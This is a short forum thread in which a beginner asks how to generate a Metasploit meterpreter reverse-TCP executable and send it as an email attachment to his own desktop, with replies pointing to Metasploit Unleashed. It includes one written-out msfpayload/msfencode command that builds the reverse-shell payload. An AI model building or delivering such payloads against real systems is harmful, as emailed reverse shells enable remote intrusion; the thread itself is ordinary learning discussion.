Might want to look into the metasploit unleashed training here
I'm new with the whole msf thing but i have done a lot of reading concerning it. Still, there are some things that i have always are bugging me. When to use,
./msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
set RHOST 10.1.1.2 ==> Target
From what i read, the "msfpayload windows/...." is to create the payload and one of the next step consist of sending that payload to someone's email as an attachment... How is it done?
What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?
I have two computers ( laptop and a desktop) i want to use metasploit on my laptop to create a payload then send it to an email address on me desktop then get into my desktop through, how do you start?
What i am trying to figure out are; when to create the payload? When to send it? How to send it as an attachment? and when to use the RHOST?
Thanks for your time and consideration
You do it like you would for any other type of email attachment you want to send...
Thanks archangel.amael but the site isn't working
lol Lupin, i guess i didnt't formulate my question correctly. What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?
As the error message states on the blog page it is an error, try harder or go home.
Just give it some time it will work again.
Be aware that I have seen people having trouble with creating executables in this manner using msfpayload. There's a thread on the forums here where I responded to spawn giving him an alternate method to do this. You may want to hunt that down if you have problems. Id also suggest that you look for other examples of those particular commands so you can get an idea of what they do. Have a look at Metasploit Unleashed as suggested by archangel.amael, as well as looking at some other Metasploit examples on the forums here.